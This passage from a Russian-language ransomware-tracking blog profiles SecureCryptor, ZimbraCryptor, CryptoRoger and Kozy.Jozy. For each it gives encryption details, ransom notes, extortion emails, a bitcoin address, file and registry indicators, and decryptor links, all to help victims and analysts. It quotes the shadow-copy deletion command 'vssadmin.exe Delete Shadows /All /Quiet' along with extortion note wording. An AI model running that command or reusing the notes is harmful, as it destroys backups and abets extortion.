1. Текст с IP-сервера как Тему (Чтобы найти алгоритм шифрования)
2. 1-2 зашифрованных файла (только не больше 1 Мб)

Мы проверим зашифрованный файл и пришлем письмо с дешифрованным файлом в доказательство имеющегося декриптера.

Запомните:
1. БЫСТРЕЕ войдёте в КОНТАКТ С НАМИ - быстрее вернёте файлы.
2. Мы будем игнорировать письма без номера IP-сервера в теме.
3. Если не получили наш ответ за 24 часа - пробуйте связаться с нами с помощью служб Yahoo или других.

К счастью в программе-вымогателе есть изъян, который позволяет вернуть зашифрованные файлы без уплаты выкупа.

Предполагается, что SecureCryptor является вариантом крипто-вымогателя Apocalypse, потому зашифрованные им файлы можно дешифровать с помощью декриптера для Apocalypse. 

Степень распространённости: средняя. 
Подробные сведения собираются.

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!!! 
Для зашифрованных файлов есть декриптер.
Скачать декриптер для Apocalypse и SecureCryptor >>
*

 Read to links: 
 Tweet on Twitter
 ID Ransomware (ID under Apocalypse)
 Write-up, Topic of Support
 * 

 Thanks: 
 Michael Gillespie
 Fabian Wosar
 *
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.

Внимание!!! 

Для зашифрованных файлов есть декриптер.

Скачать декриптер для Apocalypse и SecureCryptor

ZimbraCryptor

ZimbraCryptor Ransomware

(шифровальщик-вымогатель)

  Этот криптовымогатель шифрует с помощью AES все файлы, находящиеся в папке-хранилище /opt/zimbra/store электронной почты почтового сервера Zimbra. Затем он создаёт записку с требованием выкупа в /root/how.txt, где требует 3 биткоина, чтобы дешифровать файлы. 

  Зашифрованные файлы получают расширение .crypto. Например, 14000-20200.msg будет зашифрован как 14000-20200.msg.crypto.

  Устанавливается с помощью хакерского взлома сервера Zimbra и выполнения сценария Python. После того, как скрипт выполнится, он сгенерирует уникальные для компьютера жертвы ключи RSA и AES. Ключ AES затем шифруется с помощью ключа RSA и они оба отправляются на mpritsken@priest.com

  После того, как ключи сгенерируются, сценарий создаст записку с требованием выкупа под названием how.txt в /root/ папке. В ней указан Bitcoin-адрес, почта и открытый ключ, который нужно отправить на email вымогателей после уплата выкупа.

Содержание записки о выкупе:
Hello, If you want to unsafe your files you should send 3 btc to 1H7brbbi8xuUvM6XE6ogXYVCr6ycpX3mf2 and an email to mpritsken@priest.com with: public key...

Перевод на русский язык:

Привет, Если хотите вернуть свои файлы, то должны послать 3 btc на 1H7brbbi8xuUvM6XE6ogXYVCr6ycpX3mf2 и на mpritsken@priest.com: прислать открытый ключ...

Степень распространенности: единичные случаи.
Подробные сведения собираются. 

CryptoRoger

CryptoRoger Ransomware

(шифровальщик-вымогатель)

   Это криптовымогатель шифрует данные пользователей с помощью AES-256, а затем требует выкуп 0.5 биткоинов за дешифровку. 

К зашифрованным файлам добавляется расширение .crptrgr. 

Записка с требованием выкупа называется !Where_are_my_files!.html 

  В ней содержатся инструкции, по которым нужно скачать и установить мессенжер Tox и связаться через него с вымогателями по специальному ID. 

Перевод записки на русский язык:
Сожалею, но возникла проблема :(
Файлы на вашем ПК надежно зашифрованы
не волнуйтесь, есть решение
Цена дешифровки файлов - 0,5 Bitcoin (~$360)
(Но если вы будете вести себя неразумно цена вырастет в несколько раз.)
Чтобы получить Bitcoin-адрес для оплаты пишите мне в uTox.
Можно БЕСПЛАТНО дешифровать 1 файл, пришлите его мне в uTox.

  CryptoRoger добавляет в автозагрузку свой специальный файл с расширением .VBS . Это позволяет после входа пользователя в систему шифровать любые вновь созданные файлы. Также требуется отправить вымогателям специальный файл keys.dat

  На каждый зашифрованный файл берется MD5-хэш исходного файла и сохраняется вместе с именем файла в файл %AppData%\files.txt . 

Файлы, связанные с CryptoRoger Ransomware: 
!Where_are_my_files!.html
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
%AppData%\bg.jpeg
%AppData%\files.txt
%AppData%\keys.dat
%UserProfile%\CryptoRoger\[ransomware_exec].exe

Записи реестра, связанные с CryptoRoger Ransomware:
HKCU\Software\CryptoRoger\
HKCU\Software\CryptoRoger\AESFORUPRIVATE
HKCU\Software\CryptoRoger\UPRIV

Степень распространенности: низкая.
Подробные сведения собираются. 

Kozy.Jozy

Kozy.Jozy Ransomware

(шифровальщик-вымогатель)

   Этот криптовымогатель шифрует файлы пользователя, а потом устанавливает в качестве обоев рабочего стола изображение w.jpg с требованием прислать на почту вымогателей один из пострадавших файлов для расшифровки. В ответном письме придет уже расшифрованный файл и будет указана сумма выкупа за остальные зашифрованные файлы. 

Текст с экрана: 

ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ!

с использованием очень стойкого алгоритма RSА-2048.

Попытки восстановить файлы самостоятельно приведут лишь

к их безвозвратной порче. Если же они вам нужны то

отправьте один из пострадавших файлов на ящик

kozy.jozy@yahoo.com

К зашифрованным файлам добавляется расширение со сложным названием:

.31392E30362E32303136_ (0-20) _LSBJ1, где (0-20) - диапазон цифр от 0 до 20

.31392E30362E32303136_ (0-20) _ZHM1

.31342E30362E32303136_ (0-20) _KTR1

В начале также могут быть другие цифры, а в конце другие буквы. 

Kozy.Jozy удаляет теневые копии файлов командой: 
vssadmin.exe Delete Shadows /All /Quiet 

Список файловых расширений, подвергающихся шифрованию:

cd, .ldf, .mdf, .max, .dbf, .epf, .1cd, .md, .pdf, .ppt, .xls, .doc, .arj, .tar, .7z, .rar, .zip, .tif, .jpg, .bmp, .png, .cdr, .psd, .jpeg, .docx, .xlsx, .pptx, .accdb, .mdb, .rtf, .odt, .ods, .odb, .odg...

К сожалению, заявленное шифрование RSA-2048 действительно присутствует. Вымогатель использует 20 встроенных ключей RSA и шифрует данные жертвы с одним из них, выбранным случайным образом, в куски по 245 байт. В настоящее время, в связи с использованием этого асимметричного шифрования, нет бесплатного способа для дешифровки данных.

Степень распространенности: низкая.

Подробные сведения собираются.